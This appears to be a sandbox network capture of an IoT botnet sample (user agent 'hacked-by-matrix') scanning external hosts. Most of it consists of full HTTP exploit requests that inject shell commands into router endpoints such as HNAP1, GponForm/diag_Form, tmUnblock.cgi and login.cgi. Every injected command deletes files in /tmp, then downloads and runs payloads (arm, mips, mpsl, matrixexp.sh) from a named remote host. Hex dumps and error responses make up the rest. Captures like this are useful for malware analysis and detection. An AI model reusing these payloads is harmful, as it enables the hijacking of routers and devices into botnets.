                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1116192.168.2.1358484194.255.101.21380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.050605059 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:17.248286963 CET512INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Fri, 22 Sep 2023 00:27:57 GMT
                                                        Server: lighttpd/1.4.54
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>
                                                        Mar 21, 2024 05:23:17.879348040 CET512INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Fri, 22 Sep 2023 00:27:57 GMT
                                                        Server: lighttpd/1.4.54
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>
                                                        Mar 21, 2024 05:23:19.112850904 CET512INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Connection: close
                                                        Date: Fri, 22 Sep 2023 00:27:57 GMT
                                                        Server: lighttpd/1.4.54
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1117192.168.2.134444634.49.71.328081
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.139611006 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                        Mar 21, 2024 05:23:17.644253969 CET763OUTPOST /HNAP1/ HTTP/1.0
                                                        Content-Type: text/xml; charset="utf-8"
                                                        SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://109.205.214.35/mips && chmod +x mips;./mips hnap`
                                                        Content-Length: 640
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1118192.168.2.1357568172.64.167.1798080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.412180901 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1119192.168.2.133374438.6.181.23780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.666959047 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:18.237416029 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:18.421060085 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:18 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1120192.168.2.1341548109.206.238.67443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.708998919 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1121192.168.2.1335700109.168.34.182443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709012985 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1122192.168.2.1344196212.252.108.166443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709012985 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1123192.168.2.13450805.50.254.46443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709057093 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1124192.168.2.13529185.245.66.219443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709057093 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1125192.168.2.1346500109.60.76.22443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709081888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1126192.168.2.135702442.206.209.85443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709099054 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1127192.168.2.135884442.219.52.188443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709105015 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1128192.168.2.13571685.92.58.78443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709170103 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1129192.168.2.1341316212.67.250.82443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:17.709182978 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
